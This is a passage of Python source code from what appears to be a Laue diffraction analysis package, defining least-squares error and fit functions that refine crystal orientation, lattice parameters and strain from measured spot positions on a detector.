if nb_varying_parameters > 1:
latticeparameters[indparam] = varying_parameters_values_array[varying_parameter_index]
else:
latticeparameters[indparam] = varying_parameters_values_array[0]
latticeparameters_has_elements = True
elif parameter_name in ("distance",):
calibrationparameters[0] = varying_parameters_values_array[varying_parameter_index]
elif parameter_name in ("xcen",):
calibrationparameters[1] = varying_parameters_values_array[varying_parameter_index]
elif parameter_name in ("ycen",):
calibrationparameters[2] = varying_parameters_values_array[varying_parameter_index]
elif parameter_name in ("beta",):
calibrationparameters[3] = varying_parameters_values_array[varying_parameter_index]
elif parameter_name in ("gamma",):
calibrationparameters[4] = varying_parameters_values_array[varying_parameter_index]
elif parameter_name in ("depth",):
sourcedepth = varying_parameters_values_array[varying_parameter_index]
Uxyz = np.dot(Uz, np.dot(Ux, Uy))
# if verbose:
# print("Uxyz", Uxyz)
# print("varying_parameters_keys", varying_parameters_keys)
# print("varying_parameters_values_array", varying_parameters_values_array)
# print("Tc_has_elements", Tc_has_elements)
# print("T_has_elements", T_has_elements)
# print("Ts_has_elements", Ts_has_elements)
# print("latticeparameters_has_elements", latticeparameters_has_elements)
# print "Tc after", Tc
# print "T", T
# print 'Ts', Ts
# DictLT.RotY40 such as X=DictLT.RotY40 Xsample (xs,ys,zs =columns expressed in x,y,z frame)
# transform in sample frame Ts
# same transform in x,y,z LT frame T
# Ts = DictLT.RotY40-1 T DictLT.RotY40
# T = DictLT.RotY40 Ts DictLT.RotY40-1
newmatrix = np.dot(Uxyz, initrot)
if Tc_has_elements:
newmatrix = np.dot(newmatrix, Tc)
elif T_has_elements:
newmatrix = np.dot(T, newmatrix)
elif Ts_has_elements:
T = np.dot(np.dot(DictLT.RotY40, Ts), DictLT.RotYm40)
newmatrix = np.dot(T, newmatrix)
elif latticeparameters_has_elements:
B0matrix = CP.calc_B_RR(latticeparameters, directspace=1, setvolume=False)
# if verbose:
# print("newmatrix", newmatrix)
# print("B0matrix", B0matrix)
Xmodel, Ymodel, _, _ = calc_XY_pixelpositions(calibrationparameters,
Miller_indices,
absolutespotsindices,
UBmatrix=newmatrix,
B0matrix=B0matrix,
offset=sourcedepth,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
distanceterm = np.sqrt((Xmodel - Xexp) ** 2 + (Ymodel - Yexp) ** 2)
if weights is not None:
allweights = np.sum(weights)
distanceterm = distanceterm * weights / allweights
# if verbose:
# # print "** distance residues = " , distanceterm, " ********"
# print("** mean distance residue = ", np.mean(distanceterm), " ********")
# print "twthe, chi", twthe, chi
alldistances_array = distanceterm
if verbose:
# print "varying_parameters_values in error_function_on_demand_strain",varying_parameters_values
# print "arr_indexvaryingparameters",arr_indexvaryingparameters
# print "Xmodel",Xmodel
# print "pixX",pixX
# print "Ymodel",Ymodel
# print "pixY",pixY
# print "newmatrix",newmatrix
# print "B0matrix",B0matrix
# print "deltamat",deltamat
# print "initrot",initrot
# print "param_orient",param_calib
# print "distanceterm",distanceterm
pass
# if weights is not None:
# print("***********mean weighted pixel deviation ",
# np.mean(alldistances_array), " ********")
# else:
# print("***********mean pixel deviation ", np.mean(alldistances_array), " ********")
# print "newmatrix", newmatrix
if returnalldata:
# concatenated all pairs distances, all UB matrices, all UB.B0matrix matrices
return alldistances_array, Uxyz, newmatrix, Tc, T, Ts
else:
return alldistances_array
def fit_function_general(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
UBmatrix_start=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
**kwd):
"""
"""
if verbose:
# print("\n\n******************\nfirst error with initial values of:",
# varying_parameters_keys, " \n\n***************************\n")
error_function_general(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
B0matrix=B0matrix,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
# print("\n\n********************\nFitting parameters: ",
# varying_parameters_keys, "\n\n***************************\n")
# print("With initial values", varying_parameters_values_array)
# setting keywords of _error_function_on_demand_strain during the fitting because leastsq handle only *args but not **kwds
error_function_general.__defaults__ = (UBmatrix_start,
B0matrix,
pureRotation,
0,
pixelsize,
dim,
weights,
kf_direction,
False)
# pixX = np.array(pixX, dtype=np.float64)
# pixY = np.array(pixY, dtype=np.float64)
# LEASTSQUARE
res = leastsq(error_function_general,
varying_parameters_values_array,
args=(
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
), # args=(rre,ertetr,) last , is important!
maxfev=5000,
full_output=1,
xtol=1.0e-11,
epsfcn=0.0,
**kwd)
refined_values = res[0]
# print "res fit in fit function general", res
# print("code results", res[-1])
# print("nb iterations", res[2]["nfev"])
# print("refined_values", refined_values)
if res[-1] not in (1, 2, 3, 4, 5):
return None
else:
if verbose:
# print("\n\n ************** End of Fitting - Final errors (general fit function) ****************** \n\n"
# )
alldata = error_function_general(refined_values,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
B0matrix=B0matrix,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction,
returnalldata=True)
# alldistances_array, Uxyz, newmatrix, Tc, T, Ts
alldistances_array, Uxyz, refinedUB, refinedTc, refinedT, refinedTs = alldata
# for k, param_key in enumerate(varying_parameters_keys):
# print("%s : start %.4f ---> refined %.4f"
# % (param_key, varying_parameters_values_array[k], refined_values[k]))
# print("results:\n q= refinedT UBstart refinedTc B0 G*\nq = refinedUB B0 G*")
# print("refined UBmatrix", refinedUB)
# print("Uxyz", Uxyz)
# print("refinedTc, refinedT, refinedTs", refinedTc, refinedT, refinedTs)
# print("final mean pixel residues : %f with %d spots"
# % (np.mean(alldistances_array), len(absolutespotsindices)))
return refined_values
dict_lattice_parameters = {"a": 0, "b": 1, "c": 2, "alpha": 3, "beta": 4, "gamma": 5}
def fit_function_latticeparameters(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
UBmatrix_start=IDENTITYMATRIX,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
additional_expression="none",
**kwd):
"""
fit direct (real) unit cell lattice parameters (in refinedB0)
and orientation
q = refinedUzUyUz Ustart refinedB0 G*
with error function to return array of pair (exp. - model) distances
Sum_i [weights_i((Xmodel_i-Xexp_i)**2+(Ymodel_i-Yexp_i)**2) ]
Xmodel,Ymodel comes from G*=ha*+kb*+lc*
"""
if verbose:
# print("\n\n******************\nfirst error with initial values of:",
# varying_parameters_keys, " \n\n***************************\n",)
error_function_latticeparameters(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction,
additional_expression=additional_expression)
# print("\n\n********************\nFitting parameters: ",
# varying_parameters_keys, "\n\n***************************\n")
# print("With initial values", varying_parameters_values_array)
# print '*************** UBmatrix_start before fit************'
# print UBmatrix_start
# print '*******************************************'
# setting keywords of _error_function_on_demand_strain during the fitting because leastsq handle only *args but not **kwds
error_function_latticeparameters.__defaults__ = (UBmatrix_start,
pureRotation,
0,
pixelsize,
dim,
weights,
kf_direction,
False,
additional_expression)
# pixX = np.array(pixX, dtype=np.float64)
# pixY = np.array(pixY, dtype=np.float64)
# LEASTSQUARE
res = leastsq(error_function_latticeparameters,
varying_parameters_values_array,
args=(
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
), # args=(rre,ertetr,) last , is important!
maxfev=5000,
full_output=1,
xtol=1.0e-11,
epsfcn=0.0,
**kwd)
refined_values = res[0]
# print "res fit in fit function general", res
# print("code results", res[-1])
# print("nb iterations", res[2]["nfev"])
# print("refined_values", refined_values)
if res[-1] not in (1, 2, 3, 4, 5):
return None
else:
if 1:
# print(
# "\n\n ************** End of Fitting - Final errors (general fit function) ****************** \n\n"
# )
alldata = error_function_latticeparameters(refined_values,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction,
returnalldata=True,
additional_expression=additional_expression)
# alldistances_array, Uxyz, newmatrix, Tc, T, Ts
alldistances_array, Uxyz, refinedUB, refinedB0matrix, refinedLatticeparameters = (
alldata)
# print("\n--------------------\nresults:\n------------------")
# for k, param_key in enumerate(varying_parameters_keys):
# print("%s : start %f ---> refined %f"
# % (param_key, varying_parameters_values_array[k], refined_values[k]))
# print("q= refinedT UBstart refinedTc B0 G*\nq = refinedUB B0 G*")
# print("refined UBmatrix", refinedUB.tolist())
# print("Uxyz", Uxyz.tolist())
# print("refinedB0matrix", refinedB0matrix.tolist())
# print("refinedLatticeparameters", refinedLatticeparameters)
# print("final mean pixel residues : %f with %d spots"
# % (np.mean(alldistances_array), len(absolutespotsindices)))
return refined_values
def error_function_latticeparameters(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
returnalldata=False,
additional_expression="none"):
"""
q = UzUyUz Ustart B0 G*
Interface error function to return array of pair (exp. - model) distances
Sum_i [weights_i((Xmodel_i-Xexp_i)**2+(Ymodel_i-Yexp_i)**2) ]
Xmodel,Ymodel comes from G*=ha*+kb*+lc*
q = refinedUzUyUz Ustart refinedB0 G*
B0 reference structure reciprocal space frame (a*,b*,c*) a* // ki b* perp to a* and perp to z (z belongs to the plane of ki and detector normal vector n)
i.e. columns of B0 are components of a*,b* and c* expressed in x,y,z LT frame
refinedB0 is obtained by refining the 5 /6 lattice parameters
possible keys for parameters to be refined are:
five detector frame calibration parameters:
det_distance,det_xcen,det_ycen,det_beta, det_gamma
three misorientation angles with respect to LT orthonormal frame (x, y, z) matrices Ux, Uy,Uz:
anglex,angley,anglez
5 lattice parameters among 6 (a,b,c,alpha, beta,gamma)
"""
# reading default parameters
# CCD plane calibration parameters
if isinstance(allparameters, np.ndarray):
calibrationparameters = (allparameters.tolist())[:5]
else:
calibrationparameters = allparameters[:5]
# allparameters[5:8] = 0,0,0
Uy, Ux, Uz = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
latticeparameters = np.array(allparameters[8:14])
nb_varying_parameters = len(varying_parameters_keys)
# factorscale = 1.
for varying_parameter_index, parameter_name in enumerate(varying_parameters_keys):
# print "varying_parameter_index,parameter_name", varying_parameter_index, parameter_name
if parameter_name in ("anglex", "angley", "anglez"):
# print "got angles!"
if nb_varying_parameters > 1:
anglevalue = varying_parameters_values_array[varying_parameter_index] * DEG
else:
anglevalue = varying_parameters_values_array[0] * DEG
# print "anglevalue (rad)= ",anglevalue
ca = np.cos(anglevalue)
sa = np.sin(anglevalue)
if parameter_name is "angley":
Uy = np.array([[ca, 0, sa], [0, 1, 0], [-sa, 0, ca]])
elif parameter_name is "anglex":
Ux = np.array([[1.0, 0, 0], [0, ca, sa], [0, -sa, ca]])
elif parameter_name is "anglez":
Uz = np.array([[ca, -sa, 0], [sa, ca, 0], [0, 0, 1.0]])
elif parameter_name in ("alpha", "beta", "gamma"):
# print 'got Tc elements: ', parameter_name
indparam = dict_lattice_parameters[parameter_name]
# if nb_varying_parameters > 1:
# latticeparameters[indparam] = latticeparameters[3] * np.exp(varying_parameters_values_array[varying_parameter_index] / factorscale)
# else:
# latticeparameters[indparam] = latticeparameters[3] * np.exp(varying_parameters_values_array[0] / factorscale)
if nb_varying_parameters > 1:
latticeparameters[indparam] = varying_parameters_values_array[varying_parameter_index]
else:
latticeparameters[indparam] = varying_parameters_values_array[0]
elif parameter_name in ("a", "b", "c"):
# print 'got Tc elements: ', parameter_name
indparam = dict_lattice_parameters[parameter_name]
# if nb_varying_parameters > 1:
# latticeparameters[indparam] = latticeparameters[0] * np.exp(varying_parameters_values_array[varying_parameter_index] / factorscale)
# else:
# latticeparameters[indparam] = latticeparameters[0] * np.exp(varying_parameters_values_array[0] / factorscale)
if nb_varying_parameters > 1:
latticeparameters[indparam] = varying_parameters_values_array[varying_parameter_index]
else:
latticeparameters[indparam] = varying_parameters_values_array[0]
Uxyz = np.dot(Uz, np.dot(Ux, Uy))
if additional_expression == "a==b":
indparam = dict_lattice_parameters["b"]
indparam1 = dict_lattice_parameters["a"]
latticeparameters[indparam] = latticeparameters[indparam1]
newB0matrix = CP.calc_B_RR(latticeparameters, directspace=1, setvolume=False)
# if verbose:
# print("\n-------\nvarying_parameters_keys", varying_parameters_keys)
# print("varying_parameters_values_array", varying_parameters_values_array)
# print("Uxyz", Uxyz)
# print("latticeparameters", latticeparameters)
# print("newB0matrix", newB0matrix)
# DictLT.RotY40 such as X=DictLT.RotY40 Xsample (xs,ys,zs =columns expressed in x,y,z frame)
# transform in sample frame Ts
# same transform in x,y,z LT frame T
# Ts = DictLT.RotY40-1 T DictLT.RotY40
# T = DictLT.RotY40 Ts DictLT.RotY40-1
newmatrix = np.dot(Uxyz, initrot)
# if 0: # verbose:
# print("initrot", initrot)
# print("newmatrix", newmatrix)
Xmodel, Ymodel, _, _ = calc_XY_pixelpositions(calibrationparameters,
Miller_indices,
absolutespotsindices,
UBmatrix=newmatrix,
B0matrix=newB0matrix,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
if 0: # verbose:
print("Xmodel, Ymodel", Xmodel, Ymodel)
if 0: # verbose:
print("Xexp, Yexp", Xexp, Yexp)
distanceterm = np.sqrt((Xmodel - Xexp) ** 2 + (Ymodel - Yexp) ** 2)
if weights is not None:
allweights = np.sum(weights)
distanceterm = distanceterm * weights / allweights
# if verbose:
# # print "** distance residues = " , distanceterm, " ********"
# print("** mean distance residue = ", np.mean(distanceterm), " ********")
# print "twthe, chi", twthe, chi
alldistances_array = distanceterm
if verbose:
# print "varying_parameters_values in error_function_on_demand_strain",varying_parameters_values
# print "arr_indexvaryingparameters",arr_indexvaryingparameters
# print "Xmodel",Xmodel
# print "pixX",pixX
# print "Ymodel",Ymodel
# print "pixY",pixY
# print "newmatrix",newmatrix
# print "newB0matrix",newB0matrix
# print "deltamat",deltamat
# print "initrot",initrot
# print "param_orient",param_calib
# print "distanceterm",distanceterm
pass
# if weights is not None:
# print("***********mean weighted pixel deviation ",
# np.mean(alldistances_array), " ********")
# else:
# print(
# "***********mean pixel deviation ", np.mean(alldistances_array),
# " ********")
# print "newmatrix", newmatrix
if returnalldata:
# concatenated all pairs distances, all UB matrices, all UB.newB0matrix matrices
return alldistances_array, Uxyz, newmatrix, newB0matrix, latticeparameters
else:
return alldistances_array
def error_function_strain(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
returnalldata=False):
"""
q = refinedStrain refinedUzUyUz Ustart B0 G*
Interface error function to return array of pair (exp. - model) distances
Sum_i [weights_i((Xmodel_i-Xexp_i)**2+(Ymodel_i-Yexp_i)**2) ]
Xmodel,Ymodel comes from G*=ha*+kb*+lc*
B0 reference structure reciprocal space frame (a*,b*,c*) a* // ki b* perp to a* and perp to z (z belongs to the plane of ki and detector normal vector n)
i.e. columns of B0 are components of a*,b* and c* expressed in x,y,z LT frame
Strain of reciprocal vectors : 6 compenents of triangular up matrix ( T00 T01 T02)
( 0 T11 T12)
( 0 0 T22)
one must be set (usually T00 = 1)
Algebra:
X=PX' e'1 e'2 e'3
| | |
v v v
e1 ( . . . )
P= e2 ( . . . )
e3 ( . . . )
If A transform expressed in (e1,e2,e3) basis
and A' same transform but expressed in (e'1,e'2,e'3) basis
then A'=P-1 A P
X_LT=P X_sample
P=(cos40, 0 -sin40)
(0 1 0 )
(sin40 0 cos40)
Strain_sample=P-1 Strain_LT P
Strain_LT = P Strain_Sample P-1
"""
# reading default parameters
# CCD plane calibration parameters
if isinstance(allparameters, np.ndarray):
calibrationparameters = (allparameters.tolist())[:5]
else:
calibrationparameters = allparameters[:5]
# print 'calibrationparameters', calibrationparameters
# allparameters[5:8] = 0,0,0
Uy, Ux, Uz = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
straincomponents = np.array(allparameters[8:14])
Ts = np.array([straincomponents[:3],
[0.0, straincomponents[3], straincomponents[4]],
[0, 0, straincomponents[5]]])
# print 'Ts before', Ts
nb_varying_parameters = len(varying_parameters_keys)
for varying_parameter_index, parameter_name in enumerate(varying_parameters_keys):
# print "varying_parameter_index,parameter_name", varying_parameter_index, parameter_name
if parameter_name in ("anglex", "angley", "anglez"):
# print "got angles!"
if nb_varying_parameters > 1:
anglevalue = varying_parameters_values_array[varying_parameter_index] * DEG
else:
anglevalue = varying_parameters_values_array[0] * DEG
# print "anglevalue (rad)= ",anglevalue
ca = np.cos(anglevalue)
sa = np.sin(anglevalue)
if parameter_name is "angley":
Uy = np.array([[ca, 0, sa], [0, 1, 0], [-sa, 0, ca]])
elif parameter_name is "anglex":
Ux = np.array([[1.0, 0, 0], [0, ca, sa], [0, -sa, ca]])
elif parameter_name is "anglez":
Uz = np.array([[ca, -sa, 0], [sa, ca, 0], [0, 0, 1.0]])
elif parameter_name in ("Ts00", "Ts01", "Ts02", "Ts11", "Ts12", "Ts22"):
# print 'got Ts elements: ', parameter_name
for i in list(range(3)):
for j in list(range(3)):
if parameter_name == "Ts%d%d" % (i, j):
# print "got parameter_name", parameter_name
if nb_varying_parameters > 1:
Ts[i, j] = varying_parameters_values_array[varying_parameter_index]
else:
Ts[i, j] = varying_parameters_values_array[0]
# print 'Ts after', Ts
Uxyz = np.dot(Uz, np.dot(Ux, Uy))
newmatrix = np.dot(Uxyz, initrot)
# print 'Uxyz', Uxyz
# print 'newmatrix', newmatrix
# DictLT.RotY40 such as X=DictLT.RotY40 Xsample (xs,ys,zs =columns expressed in x,y,z frame)
# transform in sample frame Ts
# same transform in x,y,z LT frame T
# Ts = DictLT.RotY40-1 T DictLT.RotY40
# T = DictLT.RotY40 Ts DictLT.RotY40-1
T = np.dot(np.dot(DictLT.RotY40, Ts), DictLT.RotYm40)
# T = np.dot(np.dot(DictLT.RotYm40, Ts), DictLT.RotY40)
# print 'T', T
newmatrix = np.dot(T, newmatrix)
if 0: # verbose:
print("initrot", initrot)
print("newmatrix", newmatrix)
print("Miller_indices", Miller_indices)
print("absolutespotsindices", absolutespotsindices)
Xmodel, Ymodel, _, _ = calc_XY_pixelpositions(calibrationparameters,
Miller_indices,
absolutespotsindices,
UBmatrix=newmatrix,
B0matrix=B0matrix,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
distanceterm = np.sqrt((Xmodel - Xexp) ** 2 + (Ymodel - Yexp) ** 2)
if weights not in (None, False, "None", "False", 0, "0"):
allweights = np.sum(weights)
distanceterm = distanceterm * weights / allweights
# if verbose:
# # print "** distance residues = " , distanceterm, " ********"
# print("** mean distance residue = ", np.mean(distanceterm), " ********")
# print "twthe, chi", twthe, chi
alldistances_array = distanceterm
if verbose:
# print "varying_parameters_values in error_function_on_demand_strain",varying_parameters_values
# print "arr_indexvaryingparameters",arr_indexvaryingparameters
# print "Xmodel",Xmodel
# print "pixX",pixX
# print "Ymodel",Ymodel
# print "pixY",pixY
# print "newmatrix",newmatrix
# print "newB0matrix",newB0matrix
# print "deltamat",deltamat
# print "initrot",initrot
# print "param_orient",param_calib
# print "distanceterm",distanceterm
pass
# if weights is not None:
# print("***********mean weighted pixel deviation ",
# np.mean(alldistances_array), " ********")
# else:
# print("***********mean pixel deviation ",
# np.mean(alldistances_array), " ********")
# print "newmatrix", newmatrix
if returnalldata:
# concatenated all pairs distances, all UB matrices, all UB.newB0matrix matrices
return alldistances_array, Uxyz, newmatrix, Ts, T
else:
return alldistances_array
def fit_function_strain(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
UBmatrix_start=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
**kwd):
"""
fit strain components in sample frame
and orientation
q = refinedT refinedUzUyUz Ustart refinedB0 G*
with error function to return array of pair (exp. - model) distances
Sum_i [weights_i((Xmodel_i-Xexp_i)**2+(Ymodel_i-Yexp_i)**2) ]
Xmodel,Ymodel comes from G*=ha*+kb*+lc*
where T comes from Ts
"""
if verbose:
# print("\n\n******************\nfirst error with initial values of:",
# varying_parameters_keys, " \n\n***************************\n")
error_function_strain(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
B0matrix=B0matrix,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
# print("\n\n********************\nFitting parameters: ",
# varying_parameters_keys, "\n\n***************************\n")
# print("With initial values", varying_parameters_values_array)
# print '*************** UBmatrix_start before fit************'
# print UBmatrix_start
# print '*******************************************'
# setting keywords of _error_function_on_demand_strain during the fitting because leastsq handle only *args but not **kwds
error_function_strain.__defaults__ = (UBmatrix_start,
B0matrix,
pureRotation,
0,
pixelsize,
dim,
weights,
kf_direction,
False)
# pixX = np.array(pixX, dtype=np.float64)
# pixY = np.array(pixY, dtype=np.float64)
# LEASTSQUARE
res = leastsq(error_function_strain,
varying_parameters_values_array,
args=(
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
), # args=(rre,ertetr,) last , is important!
maxfev=5000,
full_output=1,
xtol=1.0e-11,
epsfcn=0.0,
**kwd)
refined_values = res[0]
# print "res fit in fit function general", res
# print("code results", res[-1])
# print("mesg", res[-2])
# print("nb iterations", res[2]["nfev"])
# print("refined_values", refined_values)
if res[-1] not in (1, 2, 3, 4, 5):
return None
else:
if 1:
# print("\n\n ************** End of Fitting - Final errors (general fit function) ****************** \n\n")
alldata = error_function_strain(refined_values,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
B0matrix=B0matrix,
pureRotation=pureRotation,
verbose=0,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction,
returnalldata=True)
# alldistances_array, Uxyz, newmatrix, Ts, T
alldistances_array, Uxyz, newmatrix, refinedTs, refinedT = alldata
# print("\n--------------------\nresults:\n------------------")
# for k, param_key in enumerate(varying_parameters_keys):
# print("%s : start %f ---> refined %f"
# % (param_key, varying_parameters_values_array[k], refined_values[k]))
# print("q= refinedT UBstart B0 G*\nq = refinedUB B0 G*")
# print("refined UBmatrix", newmatrix.tolist())
# print("Uxyz", Uxyz.tolist())
# print("refinedT", refinedT.tolist())
# print("refinedTs", refinedTs.tolist())
# print("refined_values", refined_values)
# print("final mean pixel residues : %f with %d spots"
# % (np.mean(alldistances_array), len(absolutespotsindices)))
return refined_values
def error_strain_from_elongation(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
returnalldata=False):
"""
calculate array of the sum of 3 distances from aligned points composing one single Laue spot
Each elongated spot is composed by 3 points: P1 Pc P2 (Pc at the center et P1, P2 at the ends)
error = sum (P1-P1exp)**2 + (P2-P2exp)**2 +(Pc-Pcexp)**2
But since P1exp end could be wrongly assign to simulated P2 end
error = sum (P1-P1exp)**2 + (P1-P2exp)**2 -P1P2exp**2 +
(P2-P2exp)**2 + (P2-P1exp)**2 -P1P2exp**2
+(Pc-Pcexp)**2
strain axis in sample frame:
axis_angle_1, axis_angle_2,minstrainamplitude,zerostrain,maxstrainamplitude
example: minstrainamplitude=0.98, maxstrainamplitude=1.05, zerostrain=1
u= (cos angle1, sin angle 1 cos angle 2, sin angle1 sin angle 2)
X1Model, Y1Model, XcModel,YcModel
tensile_along_u(v, tensile, u='zsample')
q = refinedStrain refinedUzUyUz Ustart B0 G*
Xmodel,Ymodel comes from G*=ha*+kb*+lc*
B0 reference structure reciprocal space frame (a*,b*,c*) a* // ki b* perp to a* and perp to z (z belongs to the plane of ki and detector normal vector n)
i.e. columns of B0 are components of a*,b* and c* expressed in x,y,z LT frame
Strain : 6 compenents of triangular up matrix ( T00 T01 T02)
( 0 T11 T12)
( 0 0 T22)
one must be set (usually T00 = 1)
Algebra:
X=PX' e'1 e'2 e'3
| | |
v v v
e1 ( . . . )
P= e2 ( . . . )
e3 ( . . . )
If A transform expressed in (e1,e2,e3) basis
and A' same transform but expressed in (e'1,e'2,e'3) basis
then A'=P-1 A P
X_LT=P X_sample
P=(cos40, 0 -sin40)
(0 1 0 )
(sin40 0 cos40)
Strain_sample=P-1 Strain_LT P
Strain_LT = P Strain_Sample P-1
"""
# reading default parameters
# CCD plane calibration parameters
if isinstance(allparameters, np.ndarray):
calibrationparameters = (allparameters.tolist())[:5]
else:
calibrationparameters = allparameters[:5]
# print 'calibrationparameters', calibrationparameters
# allparameters[5:8] = 0,0,0
Uy, Ux, Uz = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
straincomponents = np.array(allparameters[8:14])
Ts = np.array([straincomponents[:3],
[0.0, straincomponents[3], straincomponents[4]],
[0, 0, straincomponents[5]]])
# print 'Ts before', Ts
nb_varying_parameters = len(varying_parameters_keys)
for varying_parameter_index, parameter_name in enumerate(varying_parameters_keys):
# print "varying_parameter_index,parameter_name", varying_parameter_index, parameter_name
if parameter_name in ("anglex", "angley", "anglez"):
# print "got angles!"
if nb_varying_parameters > 1:
anglevalue = varying_parameters_values_array[varying_parameter_index] * DEG
else:
anglevalue = varying_parameters_values_array[0] * DEG
# print "anglevalue (rad)= ",anglevalue
ca = np.cos(anglevalue)
sa = np.sin(anglevalue)
if parameter_name is "angley":
Uy = np.array([[ca, 0, sa], [0, 1, 0], [-sa, 0, ca]])
elif parameter_name is "anglex":
Ux = np.array([[1.0, 0, 0], [0, ca, sa], [0, -sa, ca]])
elif parameter_name is "anglez":
Uz = np.array([[ca, -sa, 0], [sa, ca, 0], [0, 0, 1.0]])
elif parameter_name in ("Ts00", "Ts01", "Ts02", "Ts11", "Ts12", "Ts22"):
# print 'got Ts elements: ', parameter_name
for i in list(range(3)):
for j in list(range(3)):
if parameter_name == "Ts%d%d" % (i, j):
# print "got parameter_name", parameter_name
if nb_varying_parameters > 1:
Ts[i, j] = varying_parameters_values_array[varying_parameter_index]
else:
Ts[i, j] = varying_parameters_values_array[0]
# print 'Ts after', Ts
Uxyz = np.dot(Uz, np.dot(Ux, Uy))
newmatrix = np.dot(Uxyz, initrot)
# print 'Uxyz', Uxyz
# print 'newmatrix', newmatrix
# DictLT.RotY40 such as X=DictLT.RotY40 Xsample (xs,ys,zs =columns expressed in x,y,z frame)
# transform in sample frame Ts
# same transform in x,y,z LT frame T
# Ts = DictLT.RotY40-1 T DictLT.RotY40
# T = DictLT.RotY40 Ts DictLT.RotY40-1
T = np.dot(np.dot(DictLT.RotY40, Ts), DictLT.RotYm40)
# print 'T', T
newmatrix = np.dot(T, newmatrix)
if 0: # verbose:
print("initrot", initrot)
print("newmatrix", newmatrix)
print("Miller_indices", Miller_indices)
print("absolutespotsindices", absolutespotsindices)
Xmodel, Ymodel, _, _ = calc_XY_pixelpositions(calibrationparameters,
Miller_indices,
absolutespotsindices,
UBmatrix=newmatrix,
B0matrix=B0matrix,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
distanceterm = np.sqrt((Xmodel - Xexp) ** 2 + (Ymodel - Yexp) ** 2)
if weights is not None:
allweights = np.sum(weights)
distanceterm = distanceterm * weights / allweights
# if verbose:
# # print "** distance residues = " , distanceterm, " ********"
# print("** mean distance residue = ", np.mean(distanceterm), " ********")
# print "twthe, chi", twthe, chi
alldistances_array = distanceterm
if verbose:
# print "varying_parameters_values in error_function_on_demand_strain",varying_parameters_values
# print "arr_indexvaryingparameters",arr_indexvaryingparameters
# print "Xmodel",Xmodel
# print "pixX",pixX
# print "Ymodel",Ymodel
# print "pixY",pixY
# print "newmatrix",newmatrix
# print "newB0matrix",newB0matrix
# print "deltamat",deltamat
# print "initrot",initrot
# print "param_orient",param_calib
# print "distanceterm",distanceterm
pass
# if weights is not None:
# print("***********mean weighted pixel deviation ",
# np.mean(alldistances_array), " ********")
# else:
# print("***********mean pixel deviation ",
# np.mean(alldistances_array), " ********")
# print "newmatrix", newmatrix
if returnalldata:
# concatenated all pairs distances, all UB matrices, all UB.newB0matrix matrices
return alldistances_array, Uxyz, newmatrix, Ts, T
else:
return alldistances_array
# --- ----- TESTS & DEMOS ----------------------
